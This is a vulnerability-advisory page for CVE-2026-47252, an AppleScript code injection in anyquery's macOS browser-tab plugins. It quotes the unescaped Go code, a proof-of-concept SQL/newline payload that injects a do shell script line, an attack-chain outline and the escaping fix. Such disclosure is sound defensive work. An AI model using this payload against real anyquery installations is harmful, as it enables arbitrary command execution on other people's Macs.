Skip to main content

anyquery CVE-2026-47252

CRITICAL
Code Injection (CWE-94)
2026-06-08 https://github.com/julien040/anyquery GHSA-hrj8-hjv8-mgwc
Command Injection Code Injection Google RCE Apple Docker Chrome
9.0
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 08, 2026 - 23:33 vuln.today
Analysis Generated
Jun 08, 2026 - 23:33 vuln.today
CVE Published
Jun 08, 2026 - 23:04 nvd
CRITICAL 9.0

DescriptionNVD

AppleScript/JXA Code Injection via Unescaped URL in macOS Chrome Plugin

FieldValue
Repositoryjulien040/anyquery
Affected version0.4.4 (commit 0abd460)
VulnerabilityCWE-94 - Improper Control of Generation of Code
SeverityHigh

Summary

The chrome_tabs plugin (and equivalent Brave/Edge/Safari variants) interpolates a SQL-controlled url value directly into an AppleScript template via fmt.Sprintf(newTabScript, url) at plugins/chrome/tabs.go:141 without any escaping, then passes the result to exec.Command("osascript", "-e", ...). An authenticated anyquery user who can issue SQL INSERT INTO chrome_tabs statements - which requires local CLI access - can break out of the {URL:"..."} property record with a newline-containing payload and inject arbitrary AppleScript statements, including do shell script, achieving OS-level command execution on the macOS host. The same pattern applies to the Update path at tabs.go:169 via the JXA setURL.js script.

Affected Code

plugins/chrome/tabs.go:141 - SQL-supplied url interpolated unescaped into AppleScript template, then executed via osascript -e

go
func (t *tabsTable) Insert(rows [][]interface{}) error {
	for _, row := range rows {
		url := "chrome://newtab/"
		if rawURL, ok := row[2].(string); ok {
			url = rawURL
		}

		cmd := exec.Command("osascript", "-e", fmt.Sprintf(newTabScript, url))
		output, err := cmd.CombinedOutput()
		if err != nil {
			return fmt.Errorf("can't run osascript: %W (message: %s)\n Script: %s", err, output, fmt.Sprintf(newTabScript, url))
		}

	}

	return nil
}

plugins/chrome/tabs.go:169 - Update path interpolates url into JXA setURL.js template with identical lack of escaping

go
		if url != "" {
			cmd := exec.Command("osascript", "-l", "JavaScript", "-e", fmt.Sprintf(setURLScript, pk, url))
			output, err := cmd.CombinedOutput()
			if err != nil {
				return fmt.Errorf("can't run osascript: %W (message: %s)\n Script: %s", err, output, fmt.Sprintf(setURLScript, pk, url))
			}
		}

SQL INSERT url column (row[2]) flows through tabsTable.Insertfmt.Sprintf(newTabScript, url)exec.Command("osascript", "-e", <injected script>) at tabs.go:141.

Proof of Concept

Step 1 - Insert a newline-bearing URL via SQL: the generated AppleScript closes the {URL:"..."} property record and appends an injected do shell script "id" block, which is passed verbatim to osascript -e.

bash
docker build -f Dockerfile -t anyquery-vuln001 .
docker run --rm anyquery-vuln001 'x"}
end tell
do shell script "id"
tell application "Google Chrome"
        make new tab with properties {URL:"done'
text
SQL equivalent: INSERT INTO chrome_tabs (url) VALUES ('<INJECT_URL>')
where INJECT_URL =
x"}
end tell
do shell script "id"
tell application "Google Chrome"
	make new tab with properties {URL:"done
text
[sink:tabs.go:141] Script passed to osascript -e:
tell application "Google Chrome"
        make new tab with properties {URL:"x"}
end tell
do shell script "id"
tell application "Google Chrome"
        make new tab with properties {URL:"done"} at end of tabs of first window
end tell
[mock-osascript] Received script:
tell application "Google Chrome"
        make new tab with properties {URL:"x"}
end tell
do shell script "id"
tell application "Google Chrome"
        make new tab with properties {URL:"done"} at end of tabs of first window
end tell

RESULT: PASS - injection payload reached osascript -e verbatim; "do shell script \"id\"" present in generated script (tabs.go:141)

See attached files: Dockerfile, poc/inject_demo.go, poc/go.mod vuln-001.zip

Impact

Any local user authenticated to the anyquery CLI who can run SQL against the chrome_tabs virtual table can achieve arbitrary OS command execution on the macOS host with the privileges of the anyquery process. Because anyquery exposes its SQL interface over an HTTP server (accessible to any user who can reach the endpoint), this can be exploited by any client with INSERT or UPDATE access to the browser-tab plugins, without requiring Chrome credentials or macOS admin rights. The injected AppleScript runs under the user's macOS session, giving access to the file system, keychain prompts, and any application scriptable via Apple Events.

Remediation

Escape double-quote and newline characters in the url value before interpolation, or avoid string templating entirely. Specifically in plugins/chrome/tabs.go:

go
// Replace fmt.Sprintf(newTabScript, url) with:
safeURL := strings.ReplaceAll(url, `"`, `\"`)
safeURL = strings.ReplaceAll(safeURL, "\n", "")
safeURL = strings.ReplaceAll(safeURL, "\r", "")
cmd := exec.Command("osascript", "-e", fmt.Sprintf(newTabScript, safeURL))

A more robust fix is to pass the URL as an AppleScript variable declared via a -e prefix argument rather than string-interpolating it into the script body, or to use the osascript argv mechanism so the URL never appears inside the script source. Apply the same fix to fmt.Sprintf(setURLScript, pk, url) at tabs.go:169 for the Update path. Validate that the URL conforms to an allowed scheme (https://, http://, chrome://) before passing it to either handler.

Articles & Coverage 1

News Critical Code Injection in Docker via anyquery Chrome Plugin - CVE-2026-47252 Jun 09, 2026

AnalysisAI

Code injection in the anyquery chrome_tabs plugin (and Brave/Edge/Safari variants) on macOS allows an authenticated SQL client to break out of an AppleScript URL property record and execute arbitrary osascript commands, including do shell script for OS-level command execution. The flaw affects anyquery 0.4.4 (commit 0abd460) and stems from unescaped string interpolation at plugins/chrome/tabs.go:141 and :169. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach anyquery HTTP SQL endpoint
Delivery
Send INSERT INTO chrome_tabs with newline payload
Exploit
Break out of {URL:"..."} AppleScript record
Execution
osascript executes injected do shell script
Persist
Run arbitrary commands as macOS user
Impact
Access files, keychain, scriptable apps
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Requires the anyquery service running on macOS with one of the browser-tab plugins (chrome, brave, edge, or safari) loaded, and the attacker must have SQL INSERT or UPDATE access to the corresponding virtual table (e.g., `chrome_tabs`). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 3.1 score of 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) reflects network reachability of the anyquery SQL HTTP endpoint, low attacker privilege, and a scope change because the injected AppleScript escapes the anyquery process to invoke arbitrary `osascript` and shell commands under the user's macOS session. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with network reach to an exposed anyquery HTTP SQL endpoint on a developer's Mac issues `INSERT INTO chrome_tabs (url) VALUES (...)` with a payload that embeds a newline, closes the AppleScript `{URL:"..."}` record, and appends `do shell script "..."`. `osascript` executes the injected statement under the developer's macOS session, granting file-system, keychain-prompt, and Apple-Events-scriptable application access. …
Remediation Upstream fix available (commit c651df0b8767, pseudo-version 0.0.0-20240826075852-c651df0b8767); released patched version not independently confirmed beyond the GHSA package metadata, so upgrade anyquery to a build that includes commit c651df0b8767 or later per GHSA-hrj8-hjv8-mgwc (https://github.com/julien040/anyquery/security/advisories/GHSA-hrj8-hjv8-mgwc). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Inventory all macOS systems running anyquery 0.4.4 and identify SQL client user accounts with access to this plugin. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-47668 CRITICAL
10.0 Jun 05

Unauthenticated remote code execution in DbGate (npm package dbgate-serve, versions <= 7.1.8) lets remote attackers exec
CVE-2026-48017 HIGH
8.8 Jun 05

Remote code execution in DbGate (npm package dbgate-api) versions 7.1.8 and earlier allows any authenticated user with b
CVE-2026-45730 HIGH
8.3 Jun 04

{id}) or delete (DELETE /api/projects) any project on the platform, triggering cascading deletion of associated Function
CVE-2026-41234 HIGH
7.6 Jun 03

Authenticated zone-file injection in Froxlor <=2.3.6 allows a customer with DNS editing enabled to inject newline charac
CVE-2026-47693 MEDIUM
6.9 Jun 08

CSV Injection in Poweradmin's log export functionality allows a high-privileged attacker to embed spreadsheet formulas i

Share

CVE-2026-47252 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy